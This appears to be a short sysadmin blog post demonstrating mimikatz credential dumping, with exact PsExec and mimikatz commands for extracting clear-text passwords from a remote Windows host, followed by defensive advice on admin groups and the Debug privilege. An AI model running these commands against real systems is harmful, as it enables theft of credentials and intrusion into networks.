I have discovered a tool (mimikatz) described here to exploit a Windows system memory to get the clear text passwords.
Description of this tool found here
Mimikatz is a great post-exploitation tool written by Benjamin Delpy (gentilkiwi). A lot of times after the initial exploitation phase attackers may want to get a firmer foothold on the computer/network. Doing so often requires a set of complementary tools. Mimikatz is an attempt to bundle together some of the most useful tasks that attackers will want to perform.
Fortunately, Metasploit has decided to include Mimikatz as a meterpreter script to allow for easy access to it’s full set of features without needing to upload any files to the disk of the compromised host.
This tool is very simple to use. It works on these operating systems (XP/2003, Vista/2008, Seven/2008r2, 8/2012 et 8.1/2012r2 x86 & x64).
A simple test in your environment :
- the IP address or the hostname of a workstation to hack
- get a login with administrative privilege on this machine (memberof the local Administrators group)
- the tool PsExec (here)
- uncompress the mimikatz archive (in my example, in the c:\tools folder)
- launch a command prompt
- launch the following command :
1psexec \\10.1.1.1 -c c:\Tools\mimikatz_trunk\Win32\mimikatz.exe
1psexec \\10.1.1.1 -c c:\Tools\mimikatz_trunk\x64\mimikatz.exe
- launch the following commands
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords
… and appreciate the results
This demo gives us the evidences you have to manage and protect your system local administrator group to limit the usage of this tool.
Not yet tested : use the Group Policies to remove the Debug privilege. A good description of it is available here